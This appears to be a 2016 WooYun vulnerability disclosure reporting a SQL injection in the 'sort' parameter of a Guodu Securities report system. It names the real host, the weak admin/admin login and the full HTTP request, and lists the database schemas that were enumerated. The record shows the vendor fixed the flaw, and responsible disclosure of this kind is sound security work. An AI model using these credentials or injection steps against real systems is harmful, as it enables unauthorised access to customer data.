当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0219450

漏洞标题:国都证券某处SQL注入漏洞

相关厂商:国都证券

漏洞作者: sunrain

提交时间:2016-06-15 15:07

修复时间:2016-07-05 16:39

公开时间:2016-07-05 16:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已经确认,细节仅向厂商公开
2016-06-25: 细节向核心白帽子及相关领域专家公开
2016-07-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

问题出在http://im.guodu.com:9090中,
首先是弱口令进入系统,http://111.205.160.129:9090/report
admin admin
发现注入点,发包如下:

POST /report/Service/kpi/pageCustomerCount HTTP/1.1
Host: 111.205.160.129:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://111.205.160.129:9090/report/Service/kpi/count/customer
Content-Length: 143
Cookie: JSESSIONID=CA77F75B4233D0EF890FBD1C9E973215
Connection: keep-alive
startDate=2016%2F05%2F23+00%3A00%3A00&endDate=2016%2F06%2F7+23%3A59%3A59&companyId=1&showFooter=false&page=1&rows=20&sort=customerId&order=asc


sort参数存在注入,

14659554910914.jpg


看到GUODURA数据库中两个表数据量非常大:

1.jpg


2.jpg


所有数据库列表如下:

[*] APEX
[*] CENTER_ADMIN
[*] CENTER_ETL
[*] CENTER_ETL2
[*] CENTER_PUB
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDCMS
[*] GDZQ
[*] GUODU
[*] GUODURA
[*] JRTZ
[*] MDSYS
[*] MONI
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] RATEST
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] UCSTAR
[*] WEIXIN
[*] WMSYS
[*] WSYYT
[*] WSYYT_TEST
[*] XDB


漏洞证明:

同上

修复方案:

版权声明:转载请注明来源 sunrain@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-06-15 17:38

厂商回复:

弱口令已经修改,漏洞马上着手修复

最新状态:

2016-07-05:修复完成


漏洞评价:

评价